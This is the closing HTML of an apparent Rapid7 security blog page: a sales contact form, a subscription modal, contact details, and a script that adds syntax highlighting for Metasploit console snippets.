Block"> <div id="intro"> <div id="thankyouText" style="display:none;" class="messageBox green"> <h4><span class="success">Success!</span> Thank you for submission. We will be in touch shortly.</h4> </div> <div id="errorText" style="display:none;" class="messageBox red"> <h4><span class="error">Oops!</span> There was a problem in submission. 
Please try again.</h4> </div> <div> <h2>Submit your information and we will get in touch with you.</h2> </div> </div> <fieldset> <p id="fieldInstruction" class="instructions">All fields are mandatory</p> <dl> <dd> <label for="firstName">First Name</label> <input id="firstName" type="text" name="firstName" autocomplete="given-name"> </dd> </dl> <dl> <dd> <label for="lastName">Last Name</label> <input id="lastName" type="text" name="lastName" autocomplete="family-name"> </dd> </dl> <dl> <dd> <label for="jobTitle">Job Title</label> <input id="jobTitle" type="text" name="jobTitle" autocomplete="organization-title"> </dd> </dl> <dl> <dd> <label for="jobLevel">Job Level</label> <select name="jobLevel" id="jobLevel" class="normalSelect dropdownSelect"> <option value="0">Job Level</option> <option value="Analyst">Analyst</option> <option value="System/Security Admin">System/Security Admin</option> <option value="Manager">Manager</option> <option value="Director">Director</option> <option value="VP">VP</option> <option value="CxO">CxO</option> <option value="Student">Student</option> <option value="Other">Other</option> </select> </dd> </dl> <dl> <dd> <label for="companyName">Company</label> <input id="companyName" type="text" name="companyName" autocomplete="organization"> </dd> </dl> <dl> <dd> <label for="email">Email</label> <input id="email" type="text" name="email" autocomplete="email"> </dd> </dl> <dl> <dd> <div class="intl-phone"> <label for="phone">Phone</label> <div class="flag-container"> <div class="selected-flag"> <div class="iti-flag"></div> </div> <ul class="country-list"></ul> </div> <input id="phone" type="text" name="phone" autocomplete="tel-national" /> </div> </dd> </dl> <dl> <dd> <label for="country">Country</label> <select name="country" id="country" class="form_SelectInstruction normalSelect" onchange="updateCountryData('#contactModal');"></select> </dd> </dl> <dl> <dd> <label for="state">State</label> <select name="state" id="state" 
class="form_SelectInstruction normalSelect dropdownSelect"></select> </dd> </dl> <dl class="clearfix expand"> <dd> <label for="contactType">Reason for Contact</label> <select name="contactType" id="contactType" class="normalSelect dropdownSelect"> <option value="0">- Select -</option> <option value="20437" data-subopts="20437|Request a Demo;20438|Get Pricing Info;20439|General">I&#39;d like to learn more about vulnerability management</option> <option value="20440" data-subopts="20440|Request a Demo;20441|Get Pricing Info;20442|General">I&#39;d like to learn more about application security</option> <option value="20443" data-subopts="20443|Request a Demo;20444|Get Pricing Info;20445|General">I&#39;d like to learn more about incident detection and response</option> <option value="20433" data-subopts="20433|Request a Demo;20446|Get Pricing Info;20447|General">I&#39;d like to learn more about cloud security</option> <option value="20448" data-subopts="">I&#39;d like to learn more about Rapid7 professional or managed services</option> <option value="20450" data-subopts="">I&#39;d like to learn more about visibility, analytics, and automation</option> <option value="20434" data-subopts="20434|Request a Demo;20435|Get Pricing Info;20436|General">I&#39;d like to learn more about building a comprehensive security program</option> <option value="21019" data-subopts="21019|Request a demo;21021|Get Pricing Info;21020|General">I&#39;d like to learn more about threat intelligence.</option> </select> </dd> </dl> <dl class="clearfix expand" id="contactTypeSecondaryParent" style="display:none;"> <dd> <label for="contactTypeSecondary" class="sr-only">- Select -</label> <select name="contactTypeSecondary" id="contactTypeSecondary" class="normalSelect dropdownSelect"> <option value="0">- Select -</option> </select> </dd> </dl> <dl class="clearfix expand hide" id="howDidYouHearParent" > <dd> <label for="howDidYouHear">How did you hear about us?</label> <input id="howDidYouHear" 
type="text" name="howDidYouHear"> </dd> </dl> <dl class="expand" id="consultant" style="display: none;"> <dd> <input id="consultantField" type="checkbox" class="r7-check"> <label for="consultantField">I am a consultant, partner, or reseller.</label> </dd> </dl> <dl class="expand checkboxContainer" id="optout" style="display:none;"> <dd> <input id="explicitOptOut" type="checkbox" class="r7-check"> <label for="explicitOptOut">I do not want to receive emails regarding Rapid7's products and services.</label> </dd> <dd> <div class="disc"> <p>Issues with this page? Please email <a href="mailto:info@rapid7.com">info@rapid7.com</a>. Please see updated <a href="/privacy-policy/">Privacy Policy</a></p> </div> </dd> </dl> <dl class="expand captchaDisclaimer"> <dd> <p class="text-left" style="font-size: 0.75rem; line-height: 1.25rem;">This site is protected by reCAPTCHA and the Google <a href="https://policies.google.com/privacy" target="_blank">Privacy Policy</a> and <a href="https://policies.google.com/terms" target="_blank">Terms of Service</a> apply.</p> </dd> </dl> <dl class="captchaBlock"> <dd> <div class="g-recaptcha" data-size="invisible" data-sitekey="6Lc2JFwaAAAAAI4X5Ix2Jxu7lyXDUVm1U3sATX7a"></div> </dd> </dl> <dl class="expand"> <dd><button class="submit button btn-primary mdBtn">Submit</button></dd> </dl> <input type="hidden" id="formName" value="ContactPage"> <input type="hidden" id="contactUsFormURL" value="https://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/"> <input type="hidden" id="landorExpand" value="land"> </fieldset> </form> <script src="//www.google.com/recaptcha/api.js?hl=en&render=6Lc2JFwaAAAAAI4X5Ix2Jxu7lyXDUVm1U3sATX7a"></script> </div> <div class="large-3 cell sidebar"> <p><img class="logo" src="/includes/img/logo-black.png" alt="Rapid7 logo" data-src="/includes/img/logo-black.png"></p> <h3>General:</h3> <p><a 
href="mailto:info@rapid7.com">info@rapid7.com</a></p> <h3>Sales:</h3> <p><a href="tel:1-866-772-7437">+1-866-772-7437</a><br><a href="mailto:sales@rapid7.com">sales@rapid7.com</a></p> <h3>Support:</h3> <p><a href="tel:1-866-390-8113">+1&ndash;866&ndash;390&ndash;8113 (toll free)</a><br><a href="mailto:support@rapid7.com">support@rapid7.com</a></p> <h3>Incident Response:</h3> <p><a href="tel:1-844-787-4937">1-844-727-4347</a></p> <p><a class="view_more" href="/contact/">More Contact Info</a></p> </div> </div> </div> </section> <button class="close-button" data-close="" aria-label="Close reveal" type="button"></button> </div> </footer> <div class="reveal light" id="modal-subscribe" data-reveal> <h2>Never miss a blog</h2> <p>Get the latest stories, expertise, and news about security today.</p> <form id="mktoForm_4144"></form> <div id="thankyou" style="display: none;">You’re almost done! <br> Check your email to confirm your subscription.</div> <script> if (typeof MktoForms2 === 'undefined') { $('body').addClass('load'); } else { MktoForms2.loadForm("//information.rapid7.com", "411-NAK-970", 4144, function (form) { form.onSuccess(function (values, followUpUrl) { window.dataLayer.push({ 'event': 'form_submit_success' }); form.getFormElem().hide(); document.getElementById("thankyou").style.display = "block"; return false; }); }); } </script> <button class="close-button" data-close="" aria-label="Close reveal" type="button"></button> </div> </div> </div> </div> <!-- scripts --> <script src="/includes/js/all.min.js?cb=1731962207034"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.3.1/highlight.min.js"></script> <script> (function ($) { $(document).ready(function () { // Handle subscribe button click $('.subscribe-btn').on('click', function () { $('#modal-subscribe').foundation('open'); }); }); $(window).on("load", function () { // Highlight Metasploit console snippets hljs.registerLanguage('msf', function () { return { name: 'msf', keywords: 
{}, contains: [ { scope: 'prompt.name', begin: '^(msf\\d?|meterpreter)', relevance: 10 }, { begin: ' (exploit|payload|auxiliary|encoder|evasion|post|nop)\\(', end: '>', scope: 'test', contains: [ { scope: 'prompt.mod', begin: '(?!\\()([\\w/]+)(?=\\))' }, ] }, { scope: 'error', begin: '^\\[\\-\\]' }, { scope: 'good', begin: '^\\[\\+\\]' }, { scope: 'status', begin: '^\\[\\*\\]' }, { scope: 'warning', begin: '^\\[\\!\\]' }, hljs.QUOTE_STRING_MODE ], illegal: '\\S' }; }); hljs.highlightAll(); }); })(jQuery); </script> <script></script> <script src="/includes/js/bundles/shared/vidyard.min.js?cb=1731962207034" async defer></script> <script src="/includes/js/bundles/blocks/block.blog-tags-list.min.js?cb=1731962207034" async defer></script> <style type="text/css"> .blog-single-post__main-column .post-content a.subscribe-btn { color:#fff; } </style> </body> </html>
